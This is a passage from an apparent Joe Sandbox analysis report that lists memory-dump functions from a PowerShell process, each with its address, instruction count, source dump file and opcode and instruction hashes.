                                              • Opcode Fuzzy Hash: a4ce56ce6ac54496f3ca3ff9369294123aeb641376a8baf19eb703f7af81fc44
                                              • Instruction Fuzzy Hash: 9361C27060A385DFC7228B64C854A65BFB6AF87210B19C0EBD584CF2D3D771AC46C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0490E454 Relevance: .2, Instructions: 210COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4908bbffab21b23de9ff735b6eca1ba15e5c78a81a2bc62733107e1ac17aa645
                                              • Instruction ID: 3bf72b1491951caa53446f1e59175cd7b94ffe5d281dfc3c9e100f91988944a5
                                              • Opcode Fuzzy Hash: 4908bbffab21b23de9ff735b6eca1ba15e5c78a81a2bc62733107e1ac17aa645
                                              • Instruction Fuzzy Hash: BE812BB4A00204DFDF14CF58C594AA9BBB6EF88314F15C869E904AB795DB32EC81CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046B9488 Relevance: .2, Instructions: 194COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd968337ef1e6eab01a7f975ae9dcbe4b49b51d35edf91adec7b7372995a798b
                                              • Instruction ID: c9bcb0b954df2092efbc814a9d5c40fd03881b2c6e10ca1c01997ba7ae95007c
                                              • Opcode Fuzzy Hash: bd968337ef1e6eab01a7f975ae9dcbe4b49b51d35edf91adec7b7372995a798b
                                              • Instruction Fuzzy Hash: C4718B71A00208CFDB14DF68D880ADEBBB2FF85314F14896AD545AB751EB70AC4ACF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046B95F6 Relevance: .2, Instructions: 188COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 771a139c9ee27b9142728cdeca2daa20ebdc9e0657153a4771c167d5e6623b4f
                                              • Instruction ID: 7608331691b7ba0d1171dfae95e7d9a75729d5a9e2122a610e87bb0ff57160a3
                                              • Opcode Fuzzy Hash: 771a139c9ee27b9142728cdeca2daa20ebdc9e0657153a4771c167d5e6623b4f
                                              • Instruction Fuzzy Hash: C6713870A002489FDB14DFA5D884BEDBBF2BF88304F148429D542AB755DB31AC8ACB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046BA2A0 Relevance: .2, Instructions: 178COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5eea13bdeb06e2d251ef581eea0b27585e2b8bfa579b444c22f8ca2d37902ec3
                                              • Instruction ID: d565be8affce656908a27047ab2a1bbca1c3a3e7db8ba3def8e5ebf7577d2cda
                                              • Opcode Fuzzy Hash: 5eea13bdeb06e2d251ef581eea0b27585e2b8bfa579b444c22f8ca2d37902ec3
                                              • Instruction Fuzzy Hash: D5515D3190E3D59FD707DB68D8604DABFB0EF4721071941CBD194DB2A3D628AD88CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0490E125 Relevance: .1, Instructions: 137COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d99c9a6d4c9f9c8b3b90fdca7ec78654c245a5b28f3a7884fe5b74a4863dd3b6
                                              • Instruction ID: 5225655a682ea36b6194cc06f73462b5095d2d3c1e78872cc28b372b13580829
                                              • Opcode Fuzzy Hash: d99c9a6d4c9f9c8b3b90fdca7ec78654c245a5b28f3a7884fe5b74a4863dd3b6
                                              • Instruction Fuzzy Hash: 80416971B01242DFDF2546BD84106BABB86AFC1710F54887ED5528B7C2EF31E851C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046B9473 Relevance: .1, Instructions: 119COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 805a241651b242ae8ca2fdf335733b01ecb51acf58c85c3659a4b5839c5c4857
                                              • Instruction ID: 135ff332bd1387c007533176c7707a02e6a8c9a7a1b9ace4ba2ba0aa28358a1f
                                              • Opcode Fuzzy Hash: 805a241651b242ae8ca2fdf335733b01ecb51acf58c85c3659a4b5839c5c4857
                                              • Instruction Fuzzy Hash: B4415C71E402049FDB14DFA9C8447DDBBB2FF85310F148529D146AB795EB70AC49CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046B9219 Relevance: .1, Instructions: 119COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c6e4d29b351066ad6702784830d55b43fbee0cded517be4050ffe1b2f125deb1
                                              • Instruction ID: ae392961a993abeafb31147c3f514cae73e2fb79be1ea75f589c9ba562852d0d
                                              • Opcode Fuzzy Hash: c6e4d29b351066ad6702784830d55b43fbee0cded517be4050ffe1b2f125deb1
                                              • Instruction Fuzzy Hash: FB41AE71A403008FD714DF64D858AEE7BB2EF88714F084469D606EB7A1DB34AC45CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0490746E Relevance: .1, Instructions: 102COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9066f8996e290372ea84e8782a6ba6b1a3e8c5d0372178251f4a308464fa9c57
                                              • Instruction ID: b8bff9d8e1568f2e022190c4508864367cf5aeadfd94fcca88bfaab3fd1ceaf9
                                              • Opcode Fuzzy Hash: 9066f8996e290372ea84e8782a6ba6b1a3e8c5d0372178251f4a308464fa9c57
                                              • Instruction Fuzzy Hash: 3F314374B40214EFEB04A7A8C854BAE7A77AFC4754F10C465EA016F791CF76EC428B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046BA291 Relevance: .1, Instructions: 85COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18ba6c8135820a075ba2e7f33273495ecb0d8ac603aa797d88a231d4bbdd376a
                                              • Instruction ID: e84f779a5254dd59c5860eb2dbb61384b025d0ffd8dbcaa8f067a696d3462048
                                              • Opcode Fuzzy Hash: 18ba6c8135820a075ba2e7f33273495ecb0d8ac603aa797d88a231d4bbdd376a
                                              • Instruction Fuzzy Hash: 6E310275A00609DFCB14CF98C5809AABBB1FB49310B258699E959AB751D731FC81CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04900619 Relevance: .1, Instructions: 66COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3af130149c773a0118fc1d68a4a30f76b39ecf46830f5b7b2e71fe8fafbeb621
                                              • Instruction ID: ee614485ed4941c428e56c65eb3d89c938c93d32491d49b2b7584929502b755f
                                              • Opcode Fuzzy Hash: 3af130149c773a0118fc1d68a4a30f76b39ecf46830f5b7b2e71fe8fafbeb621
                                              • Instruction Fuzzy Hash: 6E11D33660D3858FD7128B20A841B61BF7AAFC2314B19C2ABD444AF1D3E732A841C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046B31C8 Relevance: .1, Instructions: 65COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 91488f182de2da940c959e3ac9e4a4f9bfb77709fa3ca0d1fb7829ed58a4f0ac
                                              • Instruction ID: cccc1f344f14b75036a49c6ff456f45d39a9f60ba0f944b4df19abd8f1759dc9
                                              • Opcode Fuzzy Hash: 91488f182de2da940c959e3ac9e4a4f9bfb77709fa3ca0d1fb7829ed58a4f0ac
                                              • Instruction Fuzzy Hash: F9215E74A04219DFCB00CF98D8809AEBBB5FF89300B148195D959EB352D734FD41CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046B31B9 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c265d6883ca0f574404349085a17ede09dc661622b6ab4d2b2b701acc4e99b8
                                              • Instruction ID: 68cee9827582f33ac4fb72ad79fc378cd0f36941fd490d9152e5a3c7ab12ee9a
                                              • Opcode Fuzzy Hash: 5c265d6883ca0f574404349085a17ede09dc661622b6ab4d2b2b701acc4e99b8
                                              • Instruction Fuzzy Hash: B111EA74A002199FCB00DF98D9809AEBBB5FF89310B148599D959AB352D731FD81CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02CBD005 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480323193.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_2cbd000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ba056e649489bc0e6d8a39362ec82564ffe16fc4ccbdb814c7896dd43714dea
                                              • Instruction ID: 9502b924d3bbbac2f667af9288899e70689a6840d68598f0217aafb00a680603
                                              • Opcode Fuzzy Hash: 1ba056e649489bc0e6d8a39362ec82564ffe16fc4ccbdb814c7896dd43714dea
                                              • Instruction Fuzzy Hash: 0101526140E3C09FD7138B259894752BFB4DF43224F1DC0DBD9888F1A3C6695845C7B2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02CBD01D Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480323193.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_2cbd000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d1e3c1101d8a6387383e7b8630496445939fce526eb82a2b1c83b278bcca07b3
                                              • Instruction ID: 4446097049601d2519155d32338ecf1711b6f554e568cd99ce8907b5ab881f19
                                              • Opcode Fuzzy Hash: d1e3c1101d8a6387383e7b8630496445939fce526eb82a2b1c83b278bcca07b3
                                              • Instruction Fuzzy Hash: C601F271405340EAE7114E26E984BA7BF98DF81324F08C01AED0A0B242CBB99981CAF1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 046B2D5E Relevance: .0, Instructions: 29COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2480879902.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_46b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eea8f0abffaa25a31c164ea749b807412dc189b055ff553a3d4596ecf67be97e
                                              • Instruction ID: 25541134383360d4774af38970ada9cb748490891910d37f82958ea46f1a4e52
                                              • Opcode Fuzzy Hash: eea8f0abffaa25a31c164ea749b807412dc189b055ff553a3d4596ecf67be97e
                                              • Instruction Fuzzy Hash: 32F0B735A001059FCB15CB9DD994AEEF7B1FF88324F208159E555A72A1C732A852CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 04902D8D Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2481198844.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_4900000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eed580378f5a9c9f0f422f3da44fa2e8d898558401e9d19d034a512576b3c9c1
                                              • Instruction ID: 7411b6942f795f0199550ea0fcf4d93ad5d6f3d15ea01cb095bfec6375f1be1b
                                              • Opcode Fuzzy Hash: eed580378f5a9c9f0f422f3da44fa2e8d898558401e9d19d034a512576b3c9c1
                                              • Instruction Fuzzy Hash: F0F03979609385DFC7228B14C994A51BFB2AF82215F2DC0EAC0488F1D3D736EC86C7A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%